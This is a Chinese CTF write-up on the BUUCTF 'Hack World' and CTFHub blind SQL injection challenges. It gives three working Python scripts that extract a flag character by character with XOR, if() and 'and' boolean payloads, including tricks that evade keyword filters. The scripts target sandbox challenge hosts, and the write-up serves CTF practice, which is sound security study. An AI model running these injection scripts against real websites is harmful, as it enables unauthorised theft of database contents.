Hack World和CTFHub布林注入記錄
阿新 • • 發佈:2020-11-19
Hack World
題目直接告訴你flag在flag表中的flag列
只有一個提交框,正常方法無法注入,已經過濾大部分的sql語句。
接觸python指令碼:
提交框中
輸入 1 將返回Hello, glzjin wants a girlfriend.
輸入 2 將返回Do you want to be my girlfriend?
輸入其他 數字 將返回Error Occured When Fetch Result.
輸入其他 字串 將返回bool(false)
利用不同提交資料,返回不同的結果,可以爆破出flag。
思路一,利用^異或符號: #二分法查詢 import requests import time url = 'http://9c33cf54-5425-4dc5-8c88-7f5962396e6f.node3.buuoj.cn/index.php' result = '' for x in range(1,50): high = 127 low = 32 mid = (high+low)//2 #結果向下取整 while high>low: payload = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(x,mid) #格式化函式代入x,mid data = {"id":payload} html = requests.post(url,data=data).text #抓取頁面元素 time.sleep(0.5) if "Hello" in html: low = mid+1 else: high = mid mid = (low+high)//2 result += chr(int(mid)) #型別轉換,int通過chr返回當前數值對應ascii碼值的字元 print(result) print("flag:",result)
思路二:利用if(a,1,2)若a為true返回1,flase返回2。 import requests import time url = 'http://9c33cf54-5425-4dc5-8c88-7f5962396e6f.node3.buuoj.cn/index.php' result = '' for x in range(1,50): high = 127 low = 32 mid = (high+low)//2 #結果向下取整 while high>low: payload = "if((ascii(substr((select(flag)from(flag)),{0},1))>{1}),1,2)".format(x,mid) #格式化函式代入x,mid data = {"id":payload} html = requests.post(url,data=data).text #抓取頁面元素 time.sleep(0.5) if "Hello" in html: low = mid+1 else: high = mid mid = (low+high)//2 result += chr(int(mid)) #型別轉換,int通過chr返回當前數值對應ascii碼值的字元 print(result) print("flag:",result)
CTFhub布林注入
大體思路與指令碼程式碼與上文接近,但注意構建request.post或者request.get提交表單時,post為(url,data=data),而get為(url,params=data)
import requests import time url = 'http://challenge-91f8c346e462eece.sandbox.ctfhub.com:10080/' result = '' for i in range(1,50): high = 127 low = 32 mid = (high+low)//2 while high>low: payload = '1 and (select ascii(substr((flag),{0},1)) from flag)>{1}'.format(i,mid) data = {"id":payload} html = requests.get(url,params=data).text time.sleep(0.3) if "query_success" in html: low = mid + 1 else: high = mid mid = (low+high)//2 result += chr(int(mid)) print(result) print("done!")